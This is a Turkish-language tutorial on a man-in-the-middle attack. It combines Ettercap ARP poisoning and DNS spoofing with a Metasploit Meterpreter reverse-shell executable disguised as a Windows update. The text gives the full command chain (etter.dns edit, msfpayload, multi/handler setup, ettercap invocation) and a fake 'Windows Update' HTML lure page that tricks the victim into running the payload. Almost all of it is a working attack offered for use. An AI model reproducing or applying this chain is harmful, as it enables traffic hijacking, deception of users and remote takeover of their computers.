MITM (Man in the Middle) saldirisi ve Ettercap in dns spoof eklentisini kullanarak hedef aldigimiz sistemi ag uzerinden kendi web serverimiza yonlendirip zararli dosya bulastirmayi uygulayacagiz.
Oncelikle Dns gibi davranmak icin ip adresimizi ettercap in ayarlarinda tanimlayalim.
Terminali acip ;
nano /usr/share/ettercap/etter.dns
komutu ile
* A 192.168.2.2
satir olarak tanimliyoruz varsa diger sunuculari silebilirsiniz.
Hedef ile baglantimizi saglayacak exe yi Metasploitin Msfpayload ozellgini kullanarak olusturuyoruz.Windows-KB174529-x86-ENU.exe ismi gercekligi yansitsin diye koydum kaydedecegi yer olarakta /var/www tanimladim bu komutu uygulamadan once web servisini Services/HTTPD/Start HTTPD altindan baslatiyoruz.
cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.2 X > /var/www/Windows-KB174529-x86-ENU.exe
Multi Handleri acip gerekli ayarlari yapiyoruz.
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.2.2
exploit
Son olarak Ettercap ile saldiriya gecioyoruz ;
ettercap -i wlan0 -T -q -P dns_spoof -M ARP /192.168.2.1/ /192.168.2.3/
-i ” ile internete bagli oldugum arayuzu tanimladim “wlan0″, kullandiginiz arayuzu ve ag gecidini ogrenmek icin komut satirina ;
ifconfig
yazmaniz yeterli.
Baglantiyi kendimize yonlendirdik. Web Serverimizdaki index dosyamizi duzenleyelim. /var/www/ icerisinde index.html dosyasini metin editor ile acip asagidaki kodlari yapistirip kaydedelim.
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″ />
<title>Windows Update</title>
<style type=”text/css”>
<!–
.style {
font-family: Arial, Helvetica, sans-serif;
font-weight: bold;
font-size: 24px;
color: #9999999;
}
–>
</style>
</head>
<body>
<p align=”center”><u>Critical Vulnerability</> in Windows Xp, Vista & Windows 7 <br />Download and Installation of upgrade required.</>
<p align=”center”>
<input align=”center” type=”button” value=”Download Update”
onClick=”window.open(‘/Windows-KB174529-x86-ENU.exe’,'download’); return false;”></p>
</body>
</html>
Goruntusu su sekilde ;
Hedef browseri acip herhangi bir web sitesini ziyaret etmek istediginde bu sayfa ile karsilasacak.Download Update e tiklayip indirdigi dosyayi calistirdigi anda Multi Handler ile baglanti gerceklesecek.
Bu baglantiyi kalici kilmak icin ;
Metasploit ile Kalici Backdoor Birakmak
Saldirida kullandigimiz adresler ;
192.168.2.1 = Ag Gecidi
192.168.2.2 = Saldirgan
192.168.2.3 = Hedef
